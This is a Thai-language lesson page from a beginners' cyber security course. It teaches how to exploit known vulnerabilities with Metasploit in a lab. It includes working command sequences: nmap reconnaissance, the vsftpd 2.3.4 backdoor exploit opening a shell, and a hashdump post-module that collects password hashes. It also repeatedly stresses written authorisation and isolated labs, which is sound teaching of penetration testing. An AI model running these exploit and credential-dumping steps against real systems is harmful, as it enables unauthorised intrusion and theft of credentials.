0Pricing
Cyber Security Academy · บทเรียน

การใช้ประโยชน์จากช่องโหว่ที่ทราบแล้ว

ใช้โมดูลช่องโหว่กับเป้าหมายที่มีช่องโหว่ในห้องปฏิบัติการ และตีความผลลัพธ์ของเซสชัน

การใช้ประโยชน์จากช่องโหว่ที่ทราบแล้ว เป็นบทเรียน Cyber Security Academy ฟรีบน CoddyKit นี่คือบทเรียนที่ 2 จากทั้งหมด 4 บทเรียน คุณสามารถอ่านบทเรียนทั้งหมดด้านล่างฟรี — จากนั้นลองปฏิบัติด้วยตัวคุณเองในเบราว์เซอร์พร้อมตัวแก้ไขโค้ดในตัวและติวเตอร์ AI ตลอด 24/7 บทเรียนนี้เป็นส่วนหนึ่งของเส้นทางการเรียน Cyber Security Academy และความก้าวหน้าของคุณจะซิงค์ข้ามเว็บและแอป CoddyKit คอร์ส Cyber Security Academy มีบทเรียนทั้งหมด 4 บทเรียน

จริยธรรมและการได้รับอนุญาตต้องมาก่อน

การใช้ประโยชน์จากช่องโหว่จะถูกกฎหมายเฉพาะเมื่อทำกับระบบที่คุณเป็นเจ้าของหรือได้รับอนุญาตเป็นลายลักษณ์อักษรอย่างชัดเจนให้ทดสอบเท่านั้น ตัวอย่างทั้งหมดในบทนี้มีไว้สำหรับสภาพแวดล้อมห้องปฏิบัติการที่ได้รับอนุญาต การใช้ประโยชน์จากช่องโหว่โดยไม่ได้รับอนุญาตถือเป็นความผิดทางอาญา

คำแนะนำในการตั้งค่าห้องปฏิบัติการ

ใช้ VM ที่มีช่องโหว่โดยตั้งใจ เช่น Metasploitable2/3, DVWA, เครื่องจาก VulnHub หรือ HackTheBox/TryHackMe เพื่อฝึกอย่างถูกกฎหมาย อย่าทดสอบกับระบบที่ใช้งานจริงหรือระบบในโลกจริงโดยไม่มีเอกสารขอบเขตงานที่ลงนามแล้ว

# Download Metasploitable2
# https://sourceforge.net/projects/metasploitable/

# Or use VulnHub
# https://www.vulnhub.com/

# Network: host-only adapter (isolated)

การลาดตระเวนก่อนใช้ประโยชน์จากช่องโหว่

แจกแจงข้อมูลก่อนใช้ประโยชน์จากช่องโหว่เสมอ ต้องทราบรุ่นบริการที่แน่นอน ระบบปฏิบัติการ และบริบทก่อนเลือกโค้ดโจมตีช่องโหว่ รุ่นไม่ตรงกัน = การโจมตีล้มเหลวหรือระบบหยุดทำงาน

sudo nmap -sV -O 192.168.1.100

# Identify:
# - OS version
# - Service + exact version
# - Open ports
# Then search Metasploit for matching exploit

การเลือกโค้ดโจมตีช่องโหว่ที่เหมาะสม

ค้นหาตามชื่อบริการและรุ่น ควรเลือกโมดูลที่มีระดับ Excellent หรือ Great อ่าน info เพื่อยืนยันว่าแพลตฟอร์มเป้าหมายและช่วงรุ่นตรงกัน

msf6 > search vsftpd 2.3.4
# exploit/unix/ftp/vsftpd_234_backdoor
# Rank: Excellent

msf6 > info exploit/unix/ftp/vsftpd_234_backdoor

การกำหนดค่าและเรียกใช้โค้ดโจมตีช่องโหว่

กำหนด RHOSTS (เป้าหมายระยะไกล), LHOST (IP ของคุณสำหรับการเชื่อมต่อย้อนกลับ), LPORT (พอร์ตที่รับฟัง) เลือกเพย์โหลด แล้วจึงเรียกใช้ สังเกตการสร้างเซสชันหรือข้อความแสดงข้อผิดพลาด

msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 > set RHOSTS 192.168.1.100
msf6 > set payload cmd/unix/interact
msf6 > run

# [*] Command shell session 1 opened

การตีความผลลัพธ์

การโจมตีช่องโหว่ที่สำเร็จจะเปิดเซสชัน การโจมตีที่ล้มเหลวจะแสดงข้อความแสดงข้อผิดพลาด ได้แก่ ปฏิเสธการเชื่อมต่อ (พอร์ตไม่ได้เปิดอยู่), การโจมตีช่องโหว่ล้มเหลว (รุ่นไม่ถูกต้อง), ไม่มีการสร้างเซสชัน (เพย์โหลดเชื่อมต่อกลับไม่สำเร็จ)

# Success:
[*] Started reverse TCP handler
[*] Command shell session 1 opened

# Failure:
[-] Exploit aborted: Bad return value from check
[-] Exploit failed: No session was created

การโต้ตอบกับเซสชัน

หลังใช้ประโยชน์จากช่องโหว่ ให้โต้ตอบกับเซสชันด้วย sessions -i เซสชันเชลล์คำสั่งพื้นฐานจะให้เทอร์มินัล ส่วนเซสชัน Meterpreter จะมี API ที่ครบความสามารถมากกว่า

msf6 > sessions          # list all sessions
msf6 > sessions -i 1     # interact with session 1

# Once inside:
id
whoami
ifconfig
uname -a

การพักไว้เบื้องหลังและหลายเซสชัน

กด Ctrl+Z เพื่อพักเซสชันไว้เบื้องหลังและกลับไปยัง msfconsole การทำเช่นนี้ช่วยให้คุณจัดการหลายเซสชันหรือเรียกใช้โมดูลหลังการใช้ประโยชน์จากช่องโหว่กับเซสชันที่ระบุได้

# Background active session
Ctrl+Z

# List sessions
msf6 > sessions

# Run post module against session 1
msf6 > use post/linux/gather/hashdump
msf6 > set SESSION 1
msf6 > run

คำสั่งตรวจสอบ

โมดูลโจมตีช่องโหว่จำนวนมากมีคำสั่ง check สำหรับตรวจสอบว่าเป้าหมายมีช่องโหว่หรือไม่โดยไม่ใช้ประโยชน์จากช่องโหว่จริง ควรเรียกใช้ check ก่อนเสมอหากมีคำสั่งนี้

msf6 exploit(ms17_010_eternalblue) > check

# [+] 192.168.1.100:445 - The target is vulnerable.
# Or:
# [-] 192.168.1.100:445 - The target is not vulnerable.

ข้อควรพิจารณาด้านความน่าเชื่อถือของโค้ดโจมตีช่องโหว่

โค้ดโจมตีช่องโหว่อาจทำให้บริการหยุดทำงาน กระตุ้นการแจ้งเตือน หรือทิ้งบันทึกไว้ ในการประเมินระบบที่ใช้งานจริง ให้กำหนดเวลาเรียกใช้โค้ดโจมตีในช่วงที่มีการใช้งานน้อย เตรียมแผนย้อนกลับ และยืนยันว่ามีข้อมูลสำรองก่อนเรียกใช้สิ่งใดก็ตามที่อาจสร้างความเสียหาย

การจัดทำเอกสารการใช้ประโยชน์จากช่องโหว่

บันทึกข้อมูลต่อไปนี้: เวลา เป้าหมาย IP และพอร์ต โมดูลโจมตีช่องโหว่ที่ใช้ หมายเลข CVE เพย์โหลดที่ใช้ เซสชันที่ได้รับ และหลักฐาน (ภาพหน้าจอหรือผลลัพธ์จากเทอร์มินัล) สิ่งนี้คือหลักฐานยืนยันช่องโหว่สำหรับรายงาน

ตรวจสอบอย่างรวดเร็ว

คำสั่ง "check" ของ Metasploit ทำหน้าที่อะไร

สรุป: การใช้ประโยชน์จากช่องโหว่

การใช้ประโยชน์จากช่องโหว่อย่างมีจริยธรรมต้องดำเนินตามขั้นตอนที่ชัดเจน ได้แก่ ขออนุญาตเป็นลายลักษณ์อักษร แจกแจงข้อมูลอย่างรอบคอบ เลือกโค้ดโจมตีช่องโหว่ที่ตรงกัน อ่านข้อมูลโมดูล เรียกใช้ check ก่อนหากมีคำสั่งนี้ จากนั้นจึงดำเนินการและจัดทำเอกสารทุกอย่าง อย่าใช้ประโยชน์จากช่องโหว่โดยไม่ได้รับอนุญาต — ทักษะทางเทคนิคและขอบเขตด้านจริยธรรมแยกจากกันไม่ได้

คำถามที่พบบ่อย

บทเรียน “การใช้ประโยชน์จากช่องโหว่ที่ทราบแล้ว” ฟรีหรือไม่

ใช่ — ข้อความเต็มของ “การใช้ประโยชน์จากช่องโหว่ที่ทราบแล้ว” ฟรีให้อ่านที่นี่บนเว็บ เพื่อปฏิบัติแบบโต้ตอบ (ตัวแก้ไขโค้ดในตัวและติวเตอร์ AI ตลอด 24/7) และปลดล็อคส่วนที่เหลือของคอร์ส Cyber Security Academy ให้อัปเกรดเป็น CoddyKit PRO คอร์ส Cyber Security Academy มีบทเรียนทั้งหมด 4 บทเรียน

คุณจะเรียนรู้อะไรในบทเรียน “การใช้ประโยชน์จากช่องโหว่ที่ทราบแล้ว”

ใช้โมดูลช่องโหว่กับเป้าหมายที่มีช่องโหว่ในห้องปฏิบัติการ และตีความผลลัพธ์ของเซสชัน คุณปฏิบัติ Cyber Security Academy ด้วยโค้ดที่ใช้งานได้จริงที่คุณเรียกใช้โดยตรงในเบราว์เซอร์ และติวเตอร์ AI ตลอด 24/7 ตอบคำถามของคุณขณะที่คุณไปผ่านบทเรียน

คุณต้องมีประสบการณ์ก่อนที่จะเริ่มเรียน Cyber Security Academy หรือไม่

ไม่จำเป็นต้องมีประสบการณ์มาก่อน Cyber Security Academy บน CoddyKit ออกแบบมาสำหรับผู้เริ่มต้นไปจนถึงผู้เรียนขั้นสูง คุณสามารถเริ่มต้นที่นี่หรือเริ่มจากตัวแรกและเรียนด้วยความเร็วของคุณเอง นี่คือบทเรียนที่ 2 จากทั้งหมด 4 บทเรียน

บทเรียน “การใช้ประโยชน์จากช่องโหว่ที่ทราบแล้ว” ใช้เวลานานแค่ไหน

บทเรียน CoddyKit ส่วนใหญ่ใช้เวลาประมาณ 5–10 นาที แต่ละบทเรียนจึงสั้นและเป็นแบบโต้ตอบ คุณสามารถก้าวหน้าอย่างต่อเนื่องและกลับมาเรียนต่อจากตรงที่เพิ่งหยุดบนเว็บและแอปได้เลย

ฉันเขียนและรันโค้ดในบทเรียน Cyber Security Academy นี้ได้ไหม

ได้ บทเรียน Cyber Security Academy ทุกบทมีตัวแก้ไขโค้ดในตัว คุณจึงเขียนและรันโค้ดจริงได้เลยในเบราว์เซอร์ และได้รับข้อเสนอแนะจาก AI ในทันที — ไม่ต้องติดตั้งในเครื่องของคุณ

บทเรียนทั้งหมดในหลักสูตรนี้

  1. สถาปัตยกรรม Metasploit และ msfconsole
  2. การใช้ประโยชน์จากช่องโหว่ที่ทราบแล้ว
  3. เพย์โหลด: แบบแบ่งขั้นกับแบบไม่แบ่งขั้น และ Meterpreter
  4. หลังการเจาะระบบ: เปลี่ยนเส้นทางและคงอยู่
← กลับไปที่ Cyber Security Academy